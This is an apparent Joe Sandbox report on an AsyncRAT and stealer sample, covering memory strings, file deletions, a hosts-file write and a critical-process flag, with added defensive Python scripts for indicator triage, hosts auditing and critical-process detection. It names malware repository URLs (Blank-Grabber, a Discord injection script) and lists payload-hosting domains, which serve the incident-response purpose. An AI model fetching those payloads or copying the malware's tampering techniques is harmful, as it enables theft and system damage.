Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.baidu.com/
Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.bbc.co.uk/
Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ctrip.com/
Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.co.uk/
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ebay.de/
Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: program.exe, 00000008.00000002.1941288303.00000237A537C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1653852125.00000237A5815000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/
Source: program.exe, 00000008.00000002.1941288303.00000237A537C000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/complete/
Source: program.exe, 00000008.00000003.1743204693.00000237A58BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.ifeng.com/
Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.iqiyi.com/
Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.leboncoin.fr/
Source: program.exe, 00000008.00000003.1599083346.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1947748964.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1590319286.00000237A5872000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A5300000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1747910715.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1593084728.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1715550482.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1663641819.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1601850768.00000237A4E68000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1936233267.00000237A5906000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1600386018.00000237A5872000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1638117750.00000237A5906000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/
Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1666115991.00000237A4E49000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E4A000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E49000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/
Source: program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1589347367.00000237A4E16000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
Source: program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A586E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578204766.00000237A4E82000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1578004060.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1595529292.00000237A587E000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1580291828.00000237A587E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: program.exe, 00000008.00000003.1601019406.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000003.1599043044.00000237A4EBC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.olx.pl/
Source: program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1951725180.00007FFBA666A000.00000004.00000001.01000000.00000015.sdmp, program.exe, 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmp | String found in binary or memory: https://www.openssl.org/H
Source: program.exe, 00000008.00000002.1953128317.00007FFBAA8E8000.00000040.00000001.01000000.0000000A.sdmp | String found in binary or memory: https://www.python.org/psf/license/)
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/
Source: program.exe, 00000008.00000002.1939236456.00000237A4D49000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938769127.00000237A46E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941153188.00000237A51F0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.wykop.pl/
Source: program.exe, 00000008.00000002.1939908324.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1941288303.00000237A53AC000.00000004.00001000.00020000.00000000.sdmp, program.exe, 00000008.00000003.1728396293.00000237A4DD3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: program.exe, 00000008.00000002.1941288303.00000237A53E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.zhihu.com/
Source: program.exe, 00000008.00000002.1938769127.00000237A47E8000.00000004.00000020.00020000.00000000.sdmp, program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://yahoo.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
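Most of the URL strings above are not infrastructure: the peps.python.org, urllib3 and openssl.org entries are baked into the PyInstaller-packed Python runtime, and the long run of bare origins (amazon.*, ebay.*, baidu, youtube) together with the mozilla.org URL carrying utm_source=bookmarks-toolbar is what stock browser bookmark and search-engine data looks like once a stealer has loaded a profile into memory. The two raw.githubusercontent.com references are the ones worth pivoting on. The triage script below is an added example, not part of the Joe Sandbox report and not code from any of the malware families it names; it parses indicator lines in the column-fused form this extracted page uses, and the host lists it buckets on are this example's own assumptions.

```python
"""Triage the "String found in binary or memory" entries of a sandbox report.

Added example (not Joe Sandbox code). Each indicator line is split into the
process/memory-dump list and the URL, and the URL's host is bucketed:
  payload-hosting : raw-file hosting that stealer builders fetch code from
  runtime-noise   : strings baked into the Python runtime, urllib3, OpenSSL
  browser-data    : bookmark / search-engine origins read from a browser
                    profile (bare "https://site/" origins, vendor pages)
  review          : everything else, for a human to look at
The host lists below are ASSUMPTIONS of this example, not sandbox settings.
"""
import re
from urllib.parse import urlsplit

# Accepts both "…sdmpString found…" (fused columns) and "…sdmp | String found…".
INDICATOR_RE = re.compile(
    r"Source:\s*(?P<source>.+?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)"
)
PROCESS_RE = re.compile(r"([A-Za-z0-9_.-]+\.exe)")

PAYLOAD_HOSTING = {          # ASSUMPTION: extend for your own environment
    "raw.githubusercontent.com", "gist.githubusercontent.com",
    "pastebin.com", "cdn.discordapp.com", "transfer.sh",
}
RUNTIME_NOISE = {            # ASSUMPTION: library/doc URLs shipped in the runtime
    "peps.python.org", "www.python.org", "urllib3.readthedocs.io",
    "tools.ietf.org", "www.rfc-editor.org", "www.openssl.org", "sectigo.com",
}
BROWSER_VENDOR = {"support.mozilla.org", "www.mozilla.org", "www.google.com"}


def parse_indicator(line: str):
    """Return {'url','host','bare_origin','processes'} for one line, else None."""
    match = INDICATOR_RE.search(line)
    if not match:
        return None
    source, url = match.group("source"), match.group("url")
    parts = urlsplit(url)
    return {
        "url": url,
        "host": (parts.hostname or "").lower(),
        "bare_origin": parts.path in ("", "/") and not parts.query,
        "processes": sorted(set(PROCESS_RE.findall(source))),
    }


def classify(entry) -> str:
    host = entry["host"]
    if host in PAYLOAD_HOSTING:
        return "payload-hosting"
    if host in RUNTIME_NOISE:
        return "runtime-noise"
    # A bare origin is what a bookmark or search-engine record looks like
    # once the profile database has been read into the stealer's memory.
    if host in BROWSER_VENDOR or entry["bare_origin"]:
        return "browser-data"
    return "review"


def triage(report_text: str) -> dict:
    """Bucket every indicator line of report_text by classify()."""
    buckets = {"payload-hosting": [], "runtime-noise": [], "browser-data": [], "review": []}
    for line in report_text.splitlines():
        entry = parse_indicator(line)
        if entry:
            buckets[classify(entry)].append(entry)
    return buckets


# Constructed sample: lines copied from the report, in the page's fused form.
SAMPLE_REPORT = """\
Source: program.exe, 00000008.00000003.1538192447.00000237A4790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
Source: program.exe, 00000008.00000002.1938588123.00000237A4503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
Source: skuld.exe, 00000003.00000002.1549558501.00000000011C5000.00000002.00000001.01000000.00000007.sdmp, SecurityHealthSystray.exe, 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626
Source: program.exe, 00000008.00000002.1941021680.00000237A50E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: program.exe, 00000008.00000003.1638117750.00000237A58EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
Source: program.exe, 00000008.00000003.1592258018.00000237A587E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: program.exe, 00000005.00000003.1522795628.00000139887E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
"""

if __name__ == "__main__":
    for bucket, entries in triage(SAMPLE_REPORT).items():
        for e in entries:
            print(f"{bucket:16} {e['host']:28} {','.join(e['processes'])}  {e['url']}")
```

Note that the hackirby URL keeps its trailing digits (a neighbouring memory value fused onto the string); the host is still extracted correctly, and the processes holding it (skuld.exe and the SecurityHealthSystray.exe copy) are reported so the same string can be searched for in other dumps.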

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Roaming\program.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QCFWYSKMHA.xlsx
Source: C:\Users\user\AppData\Roaming\program.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\QCFWYSKMHA.xlsx
Source: C:\Users\user\AppData\Roaming\program.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\IPKGELNTQY.xlsx
Source: C:\Users\user\AppData\Roaming\program.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\EWZCVGNOWT.mp3
Source: C:\Users\user\AppData\Roaming\program.exe | File deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\LSBIHQFDVT.docx
Source: C:\Users\user\AppData\Roaming\program.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: cmd.exe | Process created: 45
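The report records that program.exe wrote C:\Windows\System32\drivers\etc\hosts but not what it wrote. On an affected host the first question is which entries were added and whether they sinkhole update, AV or analysis domains. The audit below is an added example, not part of the Joe Sandbox report: it lists every mapping beyond the stock localhost lines and classifies it as a sinkhole or a redirect. The hosts file content it runs on is constructed, and the list of watched domain suffixes is this example's assumption.

```python
"""Audit a Windows hosts file for entries a stealer would add.

Added example (not Joe Sandbox code). Everything beyond the stock localhost
lines is reported; sinkholed entries for update/AV/analysis domains are
called out separately because they blind the host's defences.
"""
import ipaddress
import sys
from pathlib import Path

SINKHOLE_ADDRESSES = {"0.0.0.0", "127.0.0.1", "::1", "::"}
STOCK_ENTRIES = {("127.0.0.1", "localhost"), ("::1", "localhost")}
# ASSUMPTION: domains whose blocking matters most; extend for your estate.
WATCHED_SUFFIXES = (
    "microsoft.com", "windowsupdate.com", "virustotal.com", "hybrid-analysis.com",
    "any.run", "malwarebytes.com", "kaspersky.com", "avast.com", "eset.com",
)


def parse_hosts(text: str):
    """Yield (line_no, address, hostname) per mapping; comments are stripped."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        body = raw.split("#", 1)[0].strip()
        if not body:
            continue
        fields = body.split()
        for hostname in fields[1:]:          # one address may carry several names
            yield line_no, fields[0], hostname.lower()


def is_watched(hostname: str) -> bool:
    return any(hostname == s or hostname.endswith("." + s) for s in WATCHED_SUFFIXES)


def audit_hosts(text: str) -> list:
    """Return a finding dict for every non-stock mapping in the hosts text."""
    findings = []
    for line_no, address, hostname in parse_hosts(text):
        if (address, hostname) in STOCK_ENTRIES:
            continue
        try:
            ipaddress.ip_address(address)
        except ValueError:
            reason = "malformed address"
        else:
            if address in SINKHOLE_ADDRESSES:
                reason = ("blocks security/update domain" if is_watched(hostname)
                          else "sinkholes host")
            else:
                reason = f"redirects host to {address}"
        findings.append({"line": line_no, "address": address,
                         "hostname": hostname, "reason": reason})
    return findings


# Constructed sample hosts file for this example (not the file the sample wrote).
SAMPLE_HOSTS = """\
# Stock header comment
#
#       127.0.0.1       localhost
#       ::1             localhost
127.0.0.1 localhost
::1 localhost
0.0.0.0 www.virustotal.com virustotal.com   # added: blinds manual triage
0.0.0.0 download.windowsupdate.com
127.0.0.1 telemetry.example.net
198.51.100.7 login.example.com
"""

if __name__ == "__main__":
    text = Path(sys.argv[1]).read_text(errors="replace") if len(sys.argv) > 1 else SAMPLE_HOSTS
    for f in audit_hosts(text):
        print(f"line {f['line']:>3}: {f['address']:<15} {f['hostname']:<32} {f['reason']}")
```

Run it against the live file with `python audit_hosts.py C:\Windows\System32\drivers\etc\hosts`; a clean machine yields no findings, and anything it prints should be compared with the machine's change history, since legitimate software (ad blockers, developer tooling) also writes entries here.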

Operating System Destruction

Source: C:\Users\user\AppData\Roaming\eternal.exe | Process information set: 01 00 00 00
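The value 01 00 00 00 is a little-endian ULONG of 1 handed to the kernel through the process-information interface; this entry is the one behind the report's BreakOnTermination signature, and a process with ProcessBreakOnTermination set bugchecks the machine when it is killed, which is why a responder should query the flag before terminating eternal.exe or anything it spawned. The script below is an added example, not part of the Joe Sandbox report: it decodes the sandbox's byte dump and, on Windows, walks the process list and queries each PID with NtQueryInformationProcess. NtQueryInformationProcess, information class 0x1D and EnumProcesses are real Windows APIs; the helper layout is this example's own, and it assumes it is run elevated so the handles can be opened.

```python
"""Find processes with ProcessBreakOnTermination (the "critical process" flag) set.

Added example (not Joe Sandbox code). Windows only for the live query;
decode_sandbox_value() works anywhere. Run elevated.
"""
import ctypes
import struct
import sys
from typing import Optional

PROCESS_BREAK_ON_TERMINATION = 29   # PROCESSINFOCLASS value 0x1D
PROCESS_QUERY_INFORMATION = 0x0400
STATUS_SUCCESS = 0


def decode_sandbox_value(hex_bytes: str) -> int:
    """Turn the sandbox's '01 00 00 00' byte dump back into the ULONG it set."""
    return struct.unpack("<I", bytes.fromhex(hex_bytes.replace(" ", ""))[:4])[0]


def _win32():
    """Load kernel32/ntdll/psapi with explicit prototypes (Windows only)."""
    u32p = ctypes.POINTER(ctypes.c_uint32)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    ntdll = ctypes.WinDLL("ntdll")
    psapi = ctypes.WinDLL("psapi", use_last_error=True)
    kernel32.OpenProcess.restype = ctypes.c_void_p
    kernel32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    kernel32.CloseHandle.argtypes = [ctypes.c_void_p]
    ntdll.NtQueryInformationProcess.restype = ctypes.c_int32      # NTSTATUS
    ntdll.NtQueryInformationProcess.argtypes = [
        ctypes.c_void_p, ctypes.c_int, u32p, ctypes.c_uint32, u32p]
    psapi.EnumProcesses.argtypes = [u32p, ctypes.c_uint32, u32p]
    return kernel32, ntdll, psapi


def is_critical_process(pid: int) -> Optional[bool]:
    """True/False for the flag, None if the process could not be queried
    (PID 0/4, protected processes, or insufficient rights)."""
    kernel32, ntdll, _ = _win32()
    handle = kernel32.OpenProcess(PROCESS_QUERY_INFORMATION, False, pid)
    if not handle:
        return None
    try:
        flag = ctypes.c_uint32(0)
        returned = ctypes.c_uint32(0)
        status = ntdll.NtQueryInformationProcess(
            handle, PROCESS_BREAK_ON_TERMINATION, ctypes.byref(flag),
            ctypes.sizeof(flag), ctypes.byref(returned))
        return flag.value == 1 if status == STATUS_SUCCESS else None
    finally:
        kernel32.CloseHandle(handle)


def list_pids() -> list:
    """All PIDs via EnumProcesses (4096 is ample for a workstation)."""
    _, _, psapi = _win32()
    pids = (ctypes.c_uint32 * 4096)()
    needed = ctypes.c_uint32(0)
    if not psapi.EnumProcesses(pids, ctypes.sizeof(pids), ctypes.byref(needed)):
        raise ctypes.WinError(ctypes.get_last_error())
    return list(pids[: needed.value // ctypes.sizeof(ctypes.c_uint32)])


def critical_processes() -> list:
    """PIDs whose ProcessBreakOnTermination flag is set."""
    return [pid for pid in list_pids() if is_critical_process(pid)]


if __name__ == "__main__":
    print("sandbox value 01 00 00 00 decodes to", decode_sandbox_value("01 00 00 00"))
    if sys.platform != "win32":
        sys.exit("live query is Windows only")
    for pid in critical_processes():
        print(f"PID {pid}: ProcessBreakOnTermination set")
```

Expect system processes such as csrss.exe, wininit.exe and smss.exe to appear legitimately; a user-land binary under AppData\Roaming in that list is the finding. Clear the flag from a sufficiently privileged context with the matching NtSetInformationProcess call (value 0) before killing the process, or the kill will take the machine down with it.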

System Summary

Source: 0.2.EternalPredictor.exe.3d22330.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.EternalPredictor.exe.3d10cf0.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 2.0.eternal.exe.bc0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.EternalPredictor.exe.3d22330.2.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.EternalPredictor.exe.3d10cf0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000002.00000000.1499082225.0000000000BC2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1521249404.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\eternal.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Windows\System32\getmac.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
Source: C:\Users\user\AppData\Roaming\eternal.exe | Code function: 2_2_00007FFB4A137EC6
Source: C:\Users\user\AppData\Roaming\eternal.exe | Code function: 2_2_00007FFB4A139098
Source: C:\Users\user\AppData\Roaming\eternal.exe | Code function: 2_2_00007FFB4A13186D
Source: C:\Users\user\AppData\Roaming\eternal.exe | Code function: 2_2_00007FFB4A13669D
Source: C:\Users\user\AppData\Roaming\eternal.exe | Code function: 2_2_00007FFB4A132059
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C651000
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C676964
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C6589E0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C66E570
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C661D54
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C665D30
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C6635A0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C675E7C
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C66DEF0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C669EA0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C668794
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C661F60
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C661740
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C679728
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C659800
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C671874
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C6680E4
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C6708C8
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C6740AC
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C662164
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C661944
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C6639A4
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C66DA5C
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C65A2DB
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C661B50
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C662C10
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C673C10
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C675C00
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C65A474
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C676418
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C6708C8
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C65ACAD
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C651000
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C676964
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C66E570
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C661D54
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C665D30
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C6635A0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C675E7C
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C66DEF0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C669EA0
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C668794
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C661F60
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C661740
Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C679728
